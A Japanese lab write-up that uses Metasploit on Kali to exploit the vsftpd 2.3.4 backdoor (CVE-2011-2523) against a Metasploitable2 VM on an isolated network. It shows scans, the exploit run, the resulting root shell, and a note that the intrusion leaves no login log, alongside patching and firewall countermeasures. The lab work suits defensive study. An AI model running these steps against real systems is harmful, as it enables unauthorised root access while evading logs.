■msfconsoleを使ってvsftpdのCVE-2011-2523でバックドアを作成してみる。
対策を検討するのが目的のため、許可されていない対象には行わないこと。
kalilinux2018.2とMetaSplotable2-LinuxをKVM上で起動する。
http://labunix.hateblo.jp/?page=1525496768
■Metasploitable2-LinuxのMACアドレスを割り当て直す。
仮想マシンを停止、MACアドレスを一度消して、起動するだけ。
$ virsh edit Metasploitable2-Linux
■br1側のみに隔離
$ cat ./myscripts/proxy_off.sh
echo -e "kvm-stretch;1\nkali2018-2;0" | \
awk -F';' '{print "virsh domiflist "$1" | awk \047/br"$2"/{print $NF}\047 | \
virsh detach-interface --domain "$1" --type bridge --mac `xargs`"}' | sudo sh
$ ./myscripts/proxy_off.sh
Interface detached successfully
Interface detached successfully
$ echo -e "kvm-stretch\nkali2018-2\nMetasploitable2-Linux" | \
awk '{print "echo ["$1"];virsh domiflist "$1}' | sh | sed -e 's/\(52:54:00:\)..:../\1XX:XX/'
[kvm-stretch]
Interface Type Source Model MAC
-------------------------------------------------------
vnet0 bridge br0 virtio 52:54:00:XX:XX:1f
[kali2018-2]
Interface Type Source Model MAC
-------------------------------------------------------
vnet3 bridge br1 virtio 52:54:00:XX:XX:f4
[Metasploitable2-Linux]
Interface Type Source Model MAC
-------------------------------------------------------
vnet1 bridge br1 rtl8139 52:54:00:XX:XX:32
■上記で以下のNW環境となった。
$ echo "[KVM(hostonly-br1)] <--> [Red Team(kali-2018.2)],[Blue Team(metasploitable-linux-2.0.0)]" | graph-easy
+-----------------------+ +---------------------------------------+
| KVM(hostonly-br1) | <--> | Blue Team(metasploitable-linux-2.0.0) |
+-----------------------+ +---------------------------------------+
^
|
|
v
+-----------------------+
| Red Team(kali-2018.2) |
+-----------------------+
■kali-2018-2からMetasploitable2-Linuxにポートスキャンを実施。
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-05 22:22 JST
Nmap scan report for 192.168.0.2
Host is up (0.0011s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open shell Netkit rshd
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 52:54:00:9F:16:32 (QEMU virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.66 seconds
■Red Teamとしてkali2018-2でmsfconsoleを起動
しばらく待つ。
$ msfconsole
.,,. .
.\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
d8P
d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .
=[ metasploit v4.16.54-dev ]
+ -- --=[ 1757 exploits - 1006 auxiliary - 306 post ]
+ -- --=[ 536 payloads - 41 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf>
■検索のためのpostgresqlのキャッシュを確認
msf > db_status
[*] postgresql connected to msf
msf > search CVE-2014-0160
[!] Module database cache not built yet, using slow search
msf > db_rebuild_cache
[*] Purging and rebuilding the module cache in the background...
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ssl/openssl_heartbleed 2014-04-07 normal OpenSSL Heartbeat (Heartbleed) Information Leak
auxiliary/server/openssl_heartbeat_client_memory 2014-04-07 normal OpenSSL Heartbeat (Heartbleed) Client Memory Exposure
■外部に一時的に接続してkali2018-2を更新する方法。
$ virsh attach-interface --type bridge --source br0 --model virtio kali2018-2
Interface attached successfully
$ ssh kali2018-2
$ su
# ifdown eth0 ;ifup eth
# dpkg -L metasploit-framework | grep msfupdate
/usr/share/metasploit-framework/msfupdate
# /usr/share/metasploit-framework/msfupdate
msfupdate is no longer supported when Metasploit is part of the operating
system. Please use 'apt update; apt install metasploit-framework'
# apt update; apt install metasploit-framework
# exit
$ exit
$ echo -e "kali2018-2;0" | \
awk -F';' '{print "virsh domiflist "$1" | awk \047/br"$2"/{print $NF}\047 | \
virsh detach-interface --domain "$1" --type bridge --mac `xargs`"}' | sudo sh
Interface detached successfully
■最近のCVEが検索できるか確認
msf > search CVE-2018-7600
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Drupal Drupalgeddon 2 Forms API Property Injection
msf > search Drupal
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Drupal OpenID External Entity Injection
auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Drupal Views Module Users Enumeration
exploit/multi/http/drupal_drupageddon 2014-10-15 excellent Drupal HTTP Parameter Key/Value SQL Injection
exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Drupal CODER Module Remote Command Execution
exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Drupal Drupalgeddon 2 Forms API Property Injection
exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Drupal RESTWS Module Remote PHP Code Execution
exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent PHP XML-RPC Arbitrary Code Execution
■例えばvsftpd 2.3.4が稼働していることを攻撃者が知ったとする。
(既に「nmap -sV -O -T4 [target-ip」でバージョン結果は出ている)
この対策には例えばセキュリティパッチを当てる(最新バージョンにする)や、
FWでTCP/21ポートを閉じたり、vsftpdのバージョンを隠したり、IDS/IPSの配下にするなどがある。
ただし、vsftpdのバージョンを隠しても、脆弱性確認スクリプトなどで実行してみれば脆弱だとバレてしまうので、
あくまで偵察段階で対象から外れる可能性を期待する程度でしかない。
$ apt-cache show vsftpd | awk '/Version/'
Version: 3.0.3-8+b1
$ nmap -A -p 21 192.168.0.2
Starting Nmap 7.40 ( https://nmap.org ) at 2018-05-05 21:51 JST
Nmap scan report for 192.168.0.2
Host is up (0.0018s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.14 seconds
■このバージョンにはバックドア検査用のスクリプトがあり、脆弱と判断された。
File ftp-vsftpd-backdoor
https://nmap.org/nsedoc/scripts/ftp-vsftpd-backdoor.html
$ nmap --script ftp-vsftpd-backdoor -p 21 192.168.0.2
Starting Nmap 7.40 ( https://nmap.org ) at 2018-05-05 21:46 JST
Nmap scan report for 192.168.0.2
Host is up (0.0061s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: OSVDB:73573 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
| http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|_ http://osvdb.org/73573
Nmap done: 1 IP address (1 host up) scanned in 1.35 seconds
■CVE検索では見つからなかったが、vsftpd用のexploitがある。
msf > search CVE-2011-2523
msf > search type:exploit vsftpd
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
■tcp:6200のバックドアを介してシェルに接続、root権限での操作が可能になる。
例えば外部に接続出来るubuntu環境なら「apt-get install metasploit-framework」で攻撃サーバになりうるし、
root権限でnmapが使用可能なので、「ip neigh」や「ip route」で周辺のL2,L3情報からさらに偵察を行える。
一時的であれば該当のバックドアポートをFWでブロックしておくなどの対策が考えられるが、
素直にバージョンアップする方が良い。
msf exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.0.2:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.2:21 - USER: 331 Please specify the password.
[+] 192.168.0.2:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.2:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 4 opened (192.168.0.3:43633 -> 192.168.0.2:6200) at 2018-05-05 22:07:57 +0900
id
uid=0(root) gid=0(root)
whoami
root
lsb_release -d
Description: Ubuntu 8.04
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
nmap -V
Nmap version 4.53 ( http://insecure.org )
Abort session 4? [y/N] y
[*] 192.168.0.2 - Command shell session 4 closed. Reason: User exit
■MetaSploitable2-Linux側では「/var/log/auth.log」他のログに残らない。
$ sudo tail -f /var/log/*.log
==> /var/log/vsftpd.log <==
Sat May 5 09:17:19 2018 [pid 4942] CONNECT: Client "192.168.0.3"
■通常、ftpクライアントやtelnetによるftpコマンドを使用すると、
MetaSploitable2-Linux側にログインログが残る。
# kali2018-2
$ telnet 192.168.0.2 21
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user msfadmin
331 Please specify the password.
pass msfadmin
230 Login successful.
quit
221 Goodbye.
Connection closed by foreign host.
# MetaSploitable2-Linux
$ sudo tail -f /var/log/*.log
==> /var/log/vsftpd.log <==
Sat May 5 09:18:43 2018 [pid 4951] CONNECT: Client "192.168.0.3"
Sat May 5 09:18:51 2018 [pid 4950] [msfadmin] OK LOGIN: Client "192.168.0.3"